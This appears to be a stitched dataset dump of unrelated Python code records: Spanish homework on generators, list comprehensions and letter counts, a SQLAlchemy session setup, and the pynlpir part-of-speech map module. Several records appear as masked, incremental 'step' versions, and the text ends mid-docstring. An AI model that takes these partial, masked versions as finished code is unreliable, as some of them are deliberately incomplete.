for w in cancion]\nletra = filter(lambda a: cancion.count(a) == min(frecuenciaPalab), cancion)\nY = list(letra)\nY = dict.fromkeys(Y).keys()\nprint(Y)\n",
"step-5": "\"\"\"\n\n Primos <generadores> 30 pts\n\n\tRealice una generador que devuelva de todos lo numeros primos\n\texistentes de 0 hasta n-1 que cumpla con el siguiente prototipo:\n\t\n\tdef gprimo(N):\n\t\tpass\n\t\n\t\n\ta = gprimo(10)\n\tz = [e for e in a]\n\tprint(z)\n\t# [2, 3 ,5 ,7 ]\n\"\"\"\n\ndef gprimo(nmax):\n\tfor x in range(1,nmax):\n\t\tfor i in range(2,x):\n\t\t\tif x % i != 0:\n\t\t\t\t#i no es divisor de x, x puede ser primo\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\t#i es divisor de x, x no es primo\n\t\t\t\tbreak\n\t\telse:\n\t\t\t#El bucle ha terminado con normalidad, el número que estabamos comprobando es primo\n\t\t\tyield x\n\na = gprimo(10)\nz =[e for e in a]\nprint(z)\n\n\n\"\"\"\nBada Boom!!! <generadores> 20 pts\n\t\n\tDefina un generador que reciba un numero entero positivo mayor a 0 N,\n\tdicho generador proporciona numero de 1 hasta N\n\tcon las siguientes condiciones:\n\t\t1) si es multiplo de 3 coloque la cadena \"Bada\"\n\t\t2) si es multiplo de 5 coloque la cadena \"Boom!!\"\n\t\t3) si es multiplo de 3 y 5 coloque \"Bada Boom!!\"\n\t\t\n\tdef genBadaBoom(N):\n\t\tpass\n\t\t\n\ta = genBadaBoom(10)\n\tz = [e for e in a]\n\tprint(z)\n\t#[1,2,\"Bada\",4,\"Boom\",\"Bada\",7,8,\"Bada\",\"Boom\"]\n\"\"\"\ndef genBadaBoom(N):\n\tif N > 0:\n\t\tfor i in range(1,N+1):\n\t\t\tif(i % 3 == 0 and i % 5 == 0):\n\t\t\t\tyield \"Bada Boom!!\"\n\t\t\telif(i % 3 == 0):\n\t\t\t\tyield \"Bada\"\n\t\t\telif(i % 5 == 0):\n\t\t\t\tyield \"Boom!!\"\n\t\t\telse:\n\t\t\t\tyield i\n\t\t\t\na = genBadaBoom(10)\nz = [e for e in a]\nprint(z)\n\n\"\"\"\n\n\nCombinaciones <Comprensión de listas> 30pts\n\n\tUna tienda de ropa quiere saber cuantos conjuntos se pueden crear \n\ta partir de un grupo de 5 camisas (roja,negra,azul,morada y cafe), \n\t4 pantalones (negro, azul, cafe obscuro y crema) y uno de 4 accesorios\n\tposibles (cinturon, tirantes, lentes, fedora)\n\t\n\t1) Obtenga una lista con todos los conjuntos posibles e imprimala en pantalla\n\t2) imprima un 
mensaje donde mencione la cantidad de conjuntos posibles\n\t\n\"\"\"\n\ncamisas = [\"roja\",\"negra\",\"azul\",\"morada\",\"cafe\"]\npantalones = [\"negro\", \"azul\", \"cafe obscuro\", \"crema\"]\naccesorios = [\"cinturon\", \"tirantes\", \"lentes\", \"fedora\"]\ncombinaciones = [(x, y, z) for y in camisas for x in pantalones for z in accesorios]\nprint(combinaciones)\nprint(\"El número de combinaciones es:\",len(combinaciones))\n\"\"\"\n \n¿Fedora? <Comprensión de listas > 15 pts\n\n\tDel problema anterior imprima una lista que tenga todos los conjuntos\n\tque incluyen un sombrero fedora y tambien despliegue su longitud\n\t\n\t\n\"\"\"\ncombinacionesFedora = [(x, y, z) for (x,y,z) in combinaciones if z == 'fedora']\nprint(combinacionesFedora)\nprint(\"Número de combinaciones que incluyen sombrero fedora:\",len(combinacionesFedora))\n\"\"\"\n<Monads> 30 pts\n\n--Lacrimosa - Durch Nacht und Flut -- \n\nDie Suche endet jetzt und hier\nGestein kalt und nass\nGranit in Deiner Brust\nDer Stein der Dich zerdrückt\nDer Fels der Dich umgibt\nAus dem gehauen Du doch bist\n\nDespiertate te busco\nMi corazon abreté te libro\nElevate mi luz y prende mi llama\nSi a ti, yo se, te encontrare\n\nEl fragmento anterior es un canción del duo lacrimosa\n\nUsando Monads obtenga la letra \nque menos se repite por cada linea y obtenga la probabilidad de sacar dicha\nletra.\n\nNota: Pueden ayudarse de funciones recursivas y compresiones de lista. \n\n\"\"\"\n\n\n\"\"\"\n<Monads>\n\n--Hole in my soul apocalyptica-- 20 pts\n\n\n\nEl fragmento anterior es un canción del grupo apocalyptica\n\nUsando Monads obtenga la letra \nque menos se repite de todo el fragmento y obtenga la probabilidad de sacar dicha\nletra.\n\nNota: Pueden ayudarse de funciones recursivas y compresiones de lista. 
\n\n\"\"\"\ncancion = \"\"\"There's a hole in my heart, in my life, in my way\nAnd it's filled with regret and all I did, to push you away\nIf there's still a place in your life, in your heart for me\nI would do anything, so don't ask me to leave\n\nI've got a hole in my soul where you use to be\nYou're the thorn in my heart and you're killing me\nI wish I could go back and do it all differently\nI wish that I'd treated you differently\n'Cause now there's a hole in my soul where you use to be\"\"\"\ncancion = list(cancion)#Lo hacemos una lista\nfrecuenciaPalab = [cancion.count(w.casefold()) for w in cancion] #contamos la frecuencia de cada letra sin importarnos si la letra se repite\nletra = filter(lambda a: cancion.count(a) == min(frecuenciaPalab),cancion) #aplicamos un filtro a esa lista que nos devuela las letras que coinciden con el numero minimo en la frecuencia de letras que ya habiamos calculado\nY = list(letra)#Lo hacemos lista\nY = dict.fromkeys(Y).keys()#Para evitar valores duplicados que en un diccionario no se pueden duplicar los valores\nprint(Y)\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from app import config
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
engine = create_engine(config.DB_URI)
Session = scoped_session(sessionmaker(bind=engine))
|
normal
|
{
"blob_id": "86c1aee21639958f707f99bc2468e952ad6c1859",
"index": 9352,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nengine = create_engine(config.DB_URI)\nSession = scoped_session(sessionmaker(bind=engine))\n",
"step-3": "from app import config\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nengine = create_engine(config.DB_URI)\nSession = scoped_session(sessionmaker(bind=engine))\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
def get_pos_name(code, name='parent', english=True, pos_tags=POS_MAP):
"""Gets the part of speech name for *code*.
:param str code: The part of speech code to lookup, e.g. ``'nsf'``.
:param str name: Which part of speech name to include in the output. Must
be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.
Defaults to ``'parent'``. ``'parent'`` indicates that only the most
generic name should be used, e.g. ``'noun'`` for ``'nsf'``.
``'child'`` indicates that the most specific name should be used, e.g.
``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all
names should be used, e.g. ``('noun', 'toponym',
'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the
part of speech code is not transformed at all.
:param bool english: Whether to return an English or Chinese name.
:param dict pos_tags: Custom part of speech tags to use.
:returns: ``str`` if *name* is ``'parent'`` or ``'child'``.
``tuple`` if *name* is ``'all'``.
"""
return _get_pos_name(code, name, english, pos_tags)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def _get_pos_name(pos_code, names='parent', english=True, pos_map=POS_MAP):
"""Gets the part of speech name for *pos_code*."""
if names not in ('parent', 'child', 'all', 'raw'):
raise ValueError(
"names must be one of 'parent', 'child', 'all', or 'raw'; not '{0}'"
.format(names))
logger.debug("Getting {0} POS name for '{1}' formatted as '{2}'.".
format('English' if english else 'Chinese', pos_code, names))
if names == 'raw':
return pos_code
pos_code = pos_code.lower()
for i in range(1, len(pos_code) + 1):
try:
pos_key = pos_code[0:i]
pos_entry = pos_map[pos_key]
break
except KeyError:
if i == len(pos_code):
logger.warning("part of speech not recognized: '{0}'".
format(pos_code))
return None
pos = pos_entry[1 if english else 0],
if names == 'parent':
logger.debug("Part of speech name found: '{0}'".format(pos[0]))
return pos[0]
if len(pos_entry) == 3 and pos_key != pos_code:
sub_map = pos_entry[2]
logger.debug(
"Found parent part of speech name '{0}'. Descending to look for child name for '{1}'"
.format(pos_entry[1], pos_code))
sub_pos = _get_pos_name(pos_code, names, english, sub_map)
if names == 'all':
pos = pos + sub_pos if sub_pos else pos
else:
pos = sub_pos,
name = pos if names == 'all' else pos[-1]
logger.debug("Part of speech name found: '{0}'".format(name))
return name
def get_pos_name(code, name='parent', english=True, pos_tags=POS_MAP):
"""Gets the part of speech name for *code*.
:param str code: The part of speech code to lookup, e.g. ``'nsf'``.
:param str name: Which part of speech name to include in the output. Must
be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.
Defaults to ``'parent'``. ``'parent'`` indicates that only the most
generic name should be used, e.g. ``'noun'`` for ``'nsf'``.
``'child'`` indicates that the most specific name should be used, e.g.
``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all
names should be used, e.g. ``('noun', 'toponym',
'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the
part of speech code is not transformed at all.
:param bool english: Whether to return an English or Chinese name.
:param dict pos_tags: Custom part of speech tags to use.
:returns: ``str`` if *name* is ``'parent'`` or ``'child'``.
``tuple`` if *name* is ``'all'``.
"""
return _get_pos_name(code, name, english, pos_tags)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
logger = logging.getLogger('pynlpir.pos_map')
POS_MAP = {'n': ('名词', 'noun', {'nr': ('人名', 'personal name', {'nr1': (
'汉语姓氏', 'Chinese surname'), 'nr2': ('汉语名字', 'Chinese given name'),
'nrj': ('日语人名', 'Japanese personal name'), 'nrf': ('音译人名',
'transcribed personal name')}), 'ns': ('地名', 'toponym', {'nsf': ('音译地名',
'transcribed toponym')}), 'nt': ('机构团体名', 'organization/group name'),
'nz': ('其它专名', 'other proper noun'), 'nl': ('名词性惯用语', 'noun phrase'),
'ng': ('名词性语素', 'noun morpheme')}), 't': ('时间词', 'time word', {'tg': (
'时间词性语素', 'time morpheme')}), 's': ('处所词', 'locative word'), 'f': (
'方位词', 'noun of locality'), 'v': ('动词', 'verb', {'vd': ('副动词',
'auxiliary verb'), 'vn': ('名动词', 'noun-verb'), 'vshi': ('动词"是"',
'verb 是'), 'vyou': ('动词"有"', 'verb 有'), 'vf': ('趋向动词',
'directional verb'), 'vx': ('行事动词', 'performative verb'), 'vi': (
'不及物动词', 'intransitive verb'), 'vl': ('动词性惯用语', 'verb phrase'), 'vg': (
'动词性语素', 'verb morpheme')}), 'a': ('形容词', 'adjective', {'ad': ('副形词',
'auxiliary adjective'), 'an': ('名形词', 'noun-adjective'), 'ag': (
'形容词性语素', 'adjective morpheme'), 'al': ('形容词性惯用语', 'adjective phrase')}
), 'b': ('区别词', 'distinguishing word', {'bl': ('区别词性惯用语',
'distinguishing phrase')}), 'z': ('状态词', 'status word'), 'r': ('代词',
'pronoun', {'rr': ('人称代词', 'personal pronoun'), 'rz': ('指示代词',
'demonstrative pronoun', {'rzt': ('时间指示代词',
'temporal demonstrative pronoun'), 'rzs': ('处所指示代词',
'locative demonstrative pronoun'), 'rzv': ('谓词性指示代词',
'predicate demonstrative pronoun')}), 'ry': ('疑问代词',
'interrogative pronoun', {'ryt': ('时间疑问代词',
'temporal interrogative pronoun'), 'rys': ('处所疑问代词',
'locative interrogative pronoun'), 'ryv': ('谓词性疑问代词',
'predicate interrogative pronoun')}), 'rg': ('代词性语素',
'pronoun morpheme')}), 'm': ('数词', 'numeral', {'mq': ('数量词',
'numeral-plus-classifier compound'), 'mg': ('干支', 'zodiac')}), 'q': (
'量词', 'classifier', {'qv': ('动量词', 'verbal classifier'), 'qt': ('时量词',
'temporal classifier')}), 'd': ('副词', 'adverb'), 'p': ('介词',
'preposition', {'pba': ('介词“把”', 'preposition 把'), 'pbei': ('介词“被”',
'preposition 被')}), 'c': ('连词', 'conjunction', {'cc': ('并列连词',
'coordinating conjunction')}), 'u': ('助词', 'particle', {'uzhe': ('着',
'particle 着'), 'ule': ('了/喽', 'particle 了/喽'), 'uguo': ('过',
'particle 过'), 'ude1': ('的/底', 'particle 的/底'), 'ude2': ('地',
'particle 地'), 'ude3': ('得', 'particle 得'), 'usuo': ('所', 'particle 所'),
'udeng': ('等/等等/云云', 'particle 等/等等/云云'), 'uyy': ('一样/一般/似的/般',
'particle 一样/一般/似的/般'), 'udh': ('的话', 'particle 的话'), 'uls': (
'来讲/来说/而言/说来', 'particle 来讲/来说/而言/说来'), 'uzhi': ('之', 'particle 之'),
'ulian': ('连', 'particle 连')}), 'e': ('叹词', 'interjection'), 'y': (
'语气词', 'modal particle'), 'o': ('拟声词', 'onomatopoeia'), 'h': ('前缀',
'prefix'), 'k': ('后缀', 'suffix'), 'x': ('字符串', 'string', {'xe': (
'Email字符串', 'email address'), 'xs': ('微博会话分隔符', 'hashtag'), 'xm': (
'表情符合', 'emoticon'), 'xu': ('网址URL', 'URL'), 'xx': ('非语素字',
'non-morpheme character')}), 'w': ('标点符号', 'punctuation mark', {'wkz':
('左括号', 'left parenthesis/bracket'), 'wky': ('右括号',
'right parenthesis/bracket'), 'wyz': ('左引号', 'left quotation mark'),
'wyy': ('右引号', 'right quotation mark'), 'wj': ('句号', 'period'), 'ww': (
'问号', 'question mark'), 'wt': ('叹号', 'exclamation mark'), 'wd': ('逗号',
'comma'), 'wf': ('分号', 'semicolon'), 'wn': ('顿号', 'enumeration comma'),
'wm': ('冒号', 'colon'), 'ws': ('省略号', 'ellipsis'), 'wp': ('破折号', 'dash'),
'wb': ('百分号千分号', 'percent/per mille sign'), 'wh': ('单位符号',
'unit of measure sign')}), 'g': ('复合语', 'multiword expression'), 'j': (
'略语', 'abbreviation')}
def _get_pos_name(pos_code, names='parent', english=True, pos_map=POS_MAP):
"""Gets the part of speech name for *pos_code*."""
if names not in ('parent', 'child', 'all', 'raw'):
raise ValueError(
"names must be one of 'parent', 'child', 'all', or 'raw'; not '{0}'"
.format(names))
logger.debug("Getting {0} POS name for '{1}' formatted as '{2}'.".
format('English' if english else 'Chinese', pos_code, names))
if names == 'raw':
return pos_code
pos_code = pos_code.lower()
for i in range(1, len(pos_code) + 1):
try:
pos_key = pos_code[0:i]
pos_entry = pos_map[pos_key]
break
except KeyError:
if i == len(pos_code):
logger.warning("part of speech not recognized: '{0}'".
format(pos_code))
return None
pos = pos_entry[1 if english else 0],
if names == 'parent':
logger.debug("Part of speech name found: '{0}'".format(pos[0]))
return pos[0]
if len(pos_entry) == 3 and pos_key != pos_code:
sub_map = pos_entry[2]
logger.debug(
"Found parent part of speech name '{0}'. Descending to look for child name for '{1}'"
.format(pos_entry[1], pos_code))
sub_pos = _get_pos_name(pos_code, names, english, sub_map)
if names == 'all':
pos = pos + sub_pos if sub_pos else pos
else:
pos = sub_pos,
name = pos if names == 'all' else pos[-1]
logger.debug("Part of speech name found: '{0}'".format(name))
return name
def get_pos_name(code, name='parent', english=True, pos_tags=POS_MAP):
"""Gets the part of speech name for *code*.
:param str code: The part of speech code to lookup, e.g. ``'nsf'``.
:param str name: Which part of speech name to include in the output. Must
be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.
Defaults to ``'parent'``. ``'parent'`` indicates that only the most
generic name should be used, e.g. ``'noun'`` for ``'nsf'``.
``'child'`` indicates that the most specific name should be used, e.g.
``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all
names should be used, e.g. ``('noun', 'toponym',
'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the
part of speech code is not transformed at all.
:param bool english: Whether to return an English or Chinese name.
:param dict pos_tags: Custom part of speech tags to use.
:returns: ``str`` if *name* is ``'parent'`` or ``'child'``.
``tuple`` if *name* is ``'all'``.
"""
return _get_pos_name(code, name, english, pos_tags)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import logging
logger = logging.getLogger('pynlpir.pos_map')
POS_MAP = {'n': ('名词', 'noun', {'nr': ('人名', 'personal name', {'nr1': (
'汉语姓氏', 'Chinese surname'), 'nr2': ('汉语名字', 'Chinese given name'),
'nrj': ('日语人名', 'Japanese personal name'), 'nrf': ('音译人名',
'transcribed personal name')}), 'ns': ('地名', 'toponym', {'nsf': ('音译地名',
'transcribed toponym')}), 'nt': ('机构团体名', 'organization/group name'),
'nz': ('其它专名', 'other proper noun'), 'nl': ('名词性惯用语', 'noun phrase'),
'ng': ('名词性语素', 'noun morpheme')}), 't': ('时间词', 'time word', {'tg': (
'时间词性语素', 'time morpheme')}), 's': ('处所词', 'locative word'), 'f': (
'方位词', 'noun of locality'), 'v': ('动词', 'verb', {'vd': ('副动词',
'auxiliary verb'), 'vn': ('名动词', 'noun-verb'), 'vshi': ('动词"是"',
'verb 是'), 'vyou': ('动词"有"', 'verb 有'), 'vf': ('趋向动词',
'directional verb'), 'vx': ('行事动词', 'performative verb'), 'vi': (
'不及物动词', 'intransitive verb'), 'vl': ('动词性惯用语', 'verb phrase'), 'vg': (
'动词性语素', 'verb morpheme')}), 'a': ('形容词', 'adjective', {'ad': ('副形词',
'auxiliary adjective'), 'an': ('名形词', 'noun-adjective'), 'ag': (
'形容词性语素', 'adjective morpheme'), 'al': ('形容词性惯用语', 'adjective phrase')}
), 'b': ('区别词', 'distinguishing word', {'bl': ('区别词性惯用语',
'distinguishing phrase')}), 'z': ('状态词', 'status word'), 'r': ('代词',
'pronoun', {'rr': ('人称代词', 'personal pronoun'), 'rz': ('指示代词',
'demonstrative pronoun', {'rzt': ('时间指示代词',
'temporal demonstrative pronoun'), 'rzs': ('处所指示代词',
'locative demonstrative pronoun'), 'rzv': ('谓词性指示代词',
'predicate demonstrative pronoun')}), 'ry': ('疑问代词',
'interrogative pronoun', {'ryt': ('时间疑问代词',
'temporal interrogative pronoun'), 'rys': ('处所疑问代词',
'locative interrogative pronoun'), 'ryv': ('谓词性疑问代词',
'predicate interrogative pronoun')}), 'rg': ('代词性语素',
'pronoun morpheme')}), 'm': ('数词', 'numeral', {'mq': ('数量词',
'numeral-plus-classifier compound'), 'mg': ('干支', 'zodiac')}), 'q': (
'量词', 'classifier', {'qv': ('动量词', 'verbal classifier'), 'qt': ('时量词',
'temporal classifier')}), 'd': ('副词', 'adverb'), 'p': ('介词',
'preposition', {'pba': ('介词“把”', 'preposition 把'), 'pbei': ('介词“被”',
'preposition 被')}), 'c': ('连词', 'conjunction', {'cc': ('并列连词',
'coordinating conjunction')}), 'u': ('助词', 'particle', {'uzhe': ('着',
'particle 着'), 'ule': ('了/喽', 'particle 了/喽'), 'uguo': ('过',
'particle 过'), 'ude1': ('的/底', 'particle 的/底'), 'ude2': ('地',
'particle 地'), 'ude3': ('得', 'particle 得'), 'usuo': ('所', 'particle 所'),
'udeng': ('等/等等/云云', 'particle 等/等等/云云'), 'uyy': ('一样/一般/似的/般',
'particle 一样/一般/似的/般'), 'udh': ('的话', 'particle 的话'), 'uls': (
'来讲/来说/而言/说来', 'particle 来讲/来说/而言/说来'), 'uzhi': ('之', 'particle 之'),
'ulian': ('连', 'particle 连')}), 'e': ('叹词', 'interjection'), 'y': (
'语气词', 'modal particle'), 'o': ('拟声词', 'onomatopoeia'), 'h': ('前缀',
'prefix'), 'k': ('后缀', 'suffix'), 'x': ('字符串', 'string', {'xe': (
'Email字符串', 'email address'), 'xs': ('微博会话分隔符', 'hashtag'), 'xm': (
'表情符合', 'emoticon'), 'xu': ('网址URL', 'URL'), 'xx': ('非语素字',
'non-morpheme character')}), 'w': ('标点符号', 'punctuation mark', {'wkz':
('左括号', 'left parenthesis/bracket'), 'wky': ('右括号',
'right parenthesis/bracket'), 'wyz': ('左引号', 'left quotation mark'),
'wyy': ('右引号', 'right quotation mark'), 'wj': ('句号', 'period'), 'ww': (
'问号', 'question mark'), 'wt': ('叹号', 'exclamation mark'), 'wd': ('逗号',
'comma'), 'wf': ('分号', 'semicolon'), 'wn': ('顿号', 'enumeration comma'),
'wm': ('冒号', 'colon'), 'ws': ('省略号', 'ellipsis'), 'wp': ('破折号', 'dash'),
'wb': ('百分号千分号', 'percent/per mille sign'), 'wh': ('单位符号',
'unit of measure sign')}), 'g': ('复合语', 'multiword expression'), 'j': (
'略语', 'abbreviation')}
def _get_pos_name(pos_code, names='parent', english=True, pos_map=POS_MAP):
"""Gets the part of speech name for *pos_code*."""
if names not in ('parent', 'child', 'all', 'raw'):
raise ValueError(
"names must be one of 'parent', 'child', 'all', or 'raw'; not '{0}'"
.format(names))
logger.debug("Getting {0} POS name for '{1}' formatted as '{2}'.".
format('English' if english else 'Chinese', pos_code, names))
if names == 'raw':
return pos_code
pos_code = pos_code.lower()
for i in range(1, len(pos_code) + 1):
try:
pos_key = pos_code[0:i]
pos_entry = pos_map[pos_key]
break
except KeyError:
if i == len(pos_code):
logger.warning("part of speech not recognized: '{0}'".
format(pos_code))
return None
pos = pos_entry[1 if english else 0],
if names == 'parent':
logger.debug("Part of speech name found: '{0}'".format(pos[0]))
return pos[0]
if len(pos_entry) == 3 and pos_key != pos_code:
sub_map = pos_entry[2]
logger.debug(
"Found parent part of speech name '{0}'. Descending to look for child name for '{1}'"
.format(pos_entry[1], pos_code))
sub_pos = _get_pos_name(pos_code, names, english, sub_map)
if names == 'all':
pos = pos + sub_pos if sub_pos else pos
else:
pos = sub_pos,
name = pos if names == 'all' else pos[-1]
logger.debug("Part of speech name found: '{0}'".format(name))
return name
def get_pos_name(code, name='parent', english=True, pos_tags=POS_MAP):
"""Gets the part of speech name for *code*.
:param str code: The part of speech code to lookup, e.g. ``'nsf'``.
:param str name: Which part of speech name to include in the output. Must
be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.
Defaults to ``'parent'``. ``'parent'`` indicates that only the most
generic name should be used, e.g. ``'noun'`` for ``'nsf'``.
``'child'`` indicates that the most specific name should be used, e.g.
``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all
names should be used, e.g. ``('noun', 'toponym',
'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the
part of speech code is not transformed at all.
:param bool english: Whether to return an English or Chinese name.
:param dict pos_tags: Custom part of speech tags to use.
:returns: ``str`` if *name* is ``'parent'`` or ``'child'``.
``tuple`` if *name* is ``'all'``.
"""
return _get_pos_name(code, name, english, pos_tags)
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
"""Part of speech mapping constants and functions for NLPIR/ICTCLAS.
This module is used by :mod:`pynlpir` to format segmented words for output.
"""
import logging
logger = logging.getLogger("pynlpir.pos_map")
#: A dictionary that maps part of speech codes returned by NLPIR to
#: human-readable names (English and Chinese).
POS_MAP = {
"n": (
"名词",
"noun",
{
"nr": (
"人名",
"personal name",
{
"nr1": ("汉语姓氏", "Chinese surname"),
"nr2": ("汉语名字", "Chinese given name"),
"nrj": ("日语人名", "Japanese personal name"),
"nrf": ("音译人名", "transcribed personal name"),
},
),
"ns": (
"地名",
"toponym",
{
"nsf": ("音译地名", "transcribed toponym"),
},
),
"nt": ("机构团体名", "organization/group name"),
"nz": ("其它专名", "other proper noun"),
"nl": ("名词性惯用语", "noun phrase"),
"ng": ("名词性语素", "noun morpheme"),
},
),
"t": (
"时间词",
"time word",
{
"tg": ("时间词性语素", "time morpheme"),
},
),
"s": ("处所词", "locative word"),
"f": ("方位词", "noun of locality"),
"v": (
"动词",
"verb",
{
"vd": ("副动词", "auxiliary verb"),
"vn": ("名动词", "noun-verb"),
"vshi": ('动词"是"', "verb 是"),
"vyou": ('动词"有"', "verb 有"),
"vf": ("趋向动词", "directional verb"),
"vx": ("行事动词", "performative verb"),
"vi": ("不及物动词", "intransitive verb"),
"vl": ("动词性惯用语", "verb phrase"),
"vg": ("动词性语素", "verb morpheme"),
},
),
"a": (
"形容词",
"adjective",
{
"ad": ("副形词", "auxiliary adjective"),
"an": ("名形词", "noun-adjective"),
"ag": ("形容词性语素", "adjective morpheme"),
"al": ("形容词性惯用语", "adjective phrase"),
},
),
"b": (
"区别词",
"distinguishing word",
{
"bl": ("区别词性惯用语", "distinguishing phrase"),
},
),
"z": ("状态词", "status word"),
"r": (
"代词",
"pronoun",
{
"rr": ("人称代词", "personal pronoun"),
"rz": (
"指示代词",
"demonstrative pronoun",
{
"rzt": ("时间指示代词", "temporal demonstrative pronoun"),
"rzs": ("处所指示代词", "locative demonstrative pronoun"),
"rzv": ("谓词性指示代词", "predicate demonstrative pronoun"),
},
),
"ry": (
"疑问代词",
"interrogative pronoun",
{
"ryt": ("时间疑问代词", "temporal interrogative pronoun"),
"rys": ("处所疑问代词", "locative interrogative pronoun"),
"ryv": ("谓词性疑问代词", "predicate interrogative pronoun"),
},
),
"rg": ("代词性语素", "pronoun morpheme"),
},
),
"m": (
"数词",
"numeral",
{
"mq": ("数量词", "numeral-plus-classifier compound"),
"mg": ("干支", "zodiac"),
},
),
"q": (
"量词",
"classifier",
{
"qv": ("动量词", "verbal classifier"),
"qt": ("时量词", "temporal classifier"),
},
),
"d": ("副词", "adverb"),
"p": (
"介词",
"preposition",
{
"pba": ("介词“把”", "preposition 把"),
"pbei": ("介词“被”", "preposition 被"),
},
),
"c": (
"连词",
"conjunction",
{
"cc": ("并列连词", "coordinating conjunction"),
},
),
"u": (
"助词",
"particle",
{
"uzhe": ("着", "particle 着"),
"ule": ("了/喽", "particle 了/喽"),
"uguo": ("过", "particle 过"),
"ude1": ("的/底", "particle 的/底"),
"ude2": ("地", "particle 地"),
"ude3": ("得", "particle 得"),
"usuo": ("所", "particle 所"),
"udeng": ("等/等等/云云", "particle 等/等等/云云"),
"uyy": ("一样/一般/似的/般", "particle 一样/一般/似的/般"),
"udh": ("的话", "particle 的话"),
"uls": ("来讲/来说/而言/说来", "particle 来讲/来说/而言/说来"),
"uzhi": ("之", "particle 之"),
"ulian": ("连", "particle 连"),
},
),
"e": ("叹词", "interjection"),
"y": ("语气词", "modal particle"),
"o": ("拟声词", "onomatopoeia"),
"h": ("前缀", "prefix"),
"k": ("后缀", "suffix"),
"x": (
"字符串",
"string",
{
"xe": ("Email字符串", "email address"),
"xs": ("微博会话分隔符", "hashtag"),
"xm": ("表情符合", "emoticon"),
"xu": ("网址URL", "URL"),
"xx": ("非语素字", "non-morpheme character"),
},
),
"w": (
"标点符号",
"punctuation mark",
{
"wkz": ("左括号", "left parenthesis/bracket"),
"wky": ("右括号", "right parenthesis/bracket"),
"wyz": ("左引号", "left quotation mark"),
"wyy": ("右引号", "right quotation mark"),
"wj": ("句号", "period"),
"ww": ("问号", "question mark"),
"wt": ("叹号", "exclamation mark"),
"wd": ("逗号", "comma"),
"wf": ("分号", "semicolon"),
"wn": ("顿号", "enumeration comma"),
"wm": ("冒号", "colon"),
"ws": ("省略号", "ellipsis"),
"wp": ("破折号", "dash"),
"wb": ("百分号千分号", "percent/per mille sign"),
"wh": ("单位符号", "unit of measure sign"),
},
),
"g": ("复合语", "multiword expression"),
"j": ("略语", "abbreviation"),
}
def _get_pos_name(pos_code, names="parent", english=True, pos_map=POS_MAP):
"""Gets the part of speech name for *pos_code*."""
if names not in ("parent", "child", "all", "raw"):
raise ValueError(
"names must be one of 'parent', 'child', 'all', or "
"'raw'; not '{0}'".format(names)
)
logger.debug(
"Getting {0} POS name for '{1}' formatted as '{2}'.".format(
"English" if english else "Chinese", pos_code, names
)
)
if names == "raw":
return pos_code
pos_code = pos_code.lower() # Issue #10
for i in range(1, len(pos_code) + 1):
try:
pos_key = pos_code[0:i]
pos_entry = pos_map[pos_key]
break
except KeyError:
if i == len(pos_code):
logger.warning("part of speech not recognized: '{0}'".format(pos_code))
return None # Issue #20
pos = (pos_entry[1 if english else 0],)
if names == "parent":
logger.debug("Part of speech name found: '{0}'".format(pos[0]))
return pos[0]
if len(pos_entry) == 3 and pos_key != pos_code:
sub_map = pos_entry[2]
logger.debug(
"Found parent part of speech name '{0}'. Descending to "
"look for child name for '{1}'".format(pos_entry[1], pos_code)
)
sub_pos = _get_pos_name(pos_code, names, english, sub_map)
if names == "all":
# sub_pos can be None sometimes (e.g. for a word '甲')
pos = pos + sub_pos if sub_pos else pos
else:
pos = (sub_pos,)
name = pos if names == "all" else pos[-1]
logger.debug("Part of speech name found: '{0}'".format(name))
return name
def get_pos_name(code, name="parent", english=True, pos_tags=POS_MAP):
"""Gets the part of speech name for *code*.
:param str code: The part of speech code to lookup, e.g. ``'nsf'``.
:param str name: Which part of speech name to include in the output. Must
be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.
Defaults to ``'parent'``. ``'parent'`` indicates that only the most
generic name should be used, e.g. ``'noun'`` for ``'nsf'``.
``'child'`` indicates that the most specific name should be used, e.g.
``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all
names should be used, e.g. ``('noun', 'toponym',
'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the
part of speech code is not transformed at all.
:param bool english: Whether to return an English or Chinese name.
:param dict pos_tags: Custom part of speech tags to use.
:returns: ``str`` if *name* is ``'parent'`` or ``'child'``.
``tuple`` if *name* is ``'all'``.
"""
return _get_pos_name(code, name, english, pos_tags)
|
flexible
|
{
"blob_id": "093b2afef7cdfb7070eb5e94e84624afe495db66",
"index": 1948,
"step-1": "<mask token>\n\n\ndef get_pos_name(code, name='parent', english=True, pos_tags=POS_MAP):\n \"\"\"Gets the part of speech name for *code*.\n\n :param str code: The part of speech code to lookup, e.g. ``'nsf'``.\n :param str name: Which part of speech name to include in the output. Must\n be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.\n Defaults to ``'parent'``. ``'parent'`` indicates that only the most\n generic name should be used, e.g. ``'noun'`` for ``'nsf'``.\n ``'child'`` indicates that the most specific name should be used, e.g.\n ``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all\n names should be used, e.g. ``('noun', 'toponym',\n 'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the\n part of speech code is not transformed at all.\n :param bool english: Whether to return an English or Chinese name.\n :param dict 